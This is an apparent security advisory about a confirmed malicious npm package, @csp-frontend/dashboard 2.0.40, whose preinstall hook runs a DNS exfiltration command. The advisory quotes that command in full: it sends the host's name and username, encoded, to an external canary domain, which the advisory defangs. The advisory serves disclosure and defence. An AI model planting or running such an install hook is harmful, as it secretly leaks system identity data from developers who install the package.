LWA-2026-0210 confirmed malware
@csp-frontend/dashboard@2.0.40
Malicious code in @csp-frontend/dashboard (npm)
Analysis
Critical finding: preinstall hook contains DNS exfiltration payload. The hook executes `dig +short "$(echo cf-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work"` which captures system info (hostname, username), base32-encodes it, and exfiltrates via DNS query to an external canary domain. This is a classic supply-chain attack pattern for data exfiltration. Publisher email [account] suggests offensive security testing origin, but this is still malicious code in the npm supply chain requiring human review.
- analyzed by
- Leitwacht
- first seen
- May 27, 2026, 04:28 AM
- analyzed
- May 27, 2026, 04:32 AM
Related advisories
browse all confirmed advisories →Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.